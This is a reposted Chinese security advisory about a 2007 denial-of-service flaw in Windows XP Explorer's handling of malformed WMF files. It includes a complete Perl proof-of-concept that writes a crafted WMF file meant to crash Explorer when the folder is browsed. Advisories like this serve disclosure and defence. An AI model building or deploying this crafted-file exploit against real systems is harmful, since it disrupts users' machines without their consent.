[转贴]Microsoft Windows资源管理器WMF文件拒绝服务漏洞

信息来源:绿盟科技


Microsoft Windows资源管理器WMF文件拒绝服务漏洞

发布日期：2007-01-10
更新日期：2007-01-11

受影响系统：
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 21992

Microsoft Windows是微软发布的非常流行的操作系统。

Windows在处理畸形WMF文件时存在拒绝服务漏洞，资源管理器在处理包含畸形文件的目录时会发生崩溃。

<*来源：Orbital （orbital_q3nius@yahoo.com）
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
# WMF 0-day Dos Exploit
# Exploit Coded by Vampire (Form Iran)
# Contact : Vampire_Chiristof@yahoo.com
# Bug Found by Orbital
# Gr33tz To : Spy , l0pht.blackhat , Samir , Scorpino y4nliz and All Iranian Hackers and Programmers !!!
# Contact : orbital_q3nius@yahoo.com
# Coded In Perl , PHP , Python
# the C version written but Still priv8
print "\nWMF Denial of Service Exploit by Vampire in PHP , PERL , PYTHON , C";
print "\n\nGenerating vampire.wmf...";
open(WMF, ">./vampire.wmf") or die "Cannot Create WMF File !\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nNow Try To Browse Folder In XP Explorer And Wait !!!\n";

建议：
--------------------------------------------------------------------------------
厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/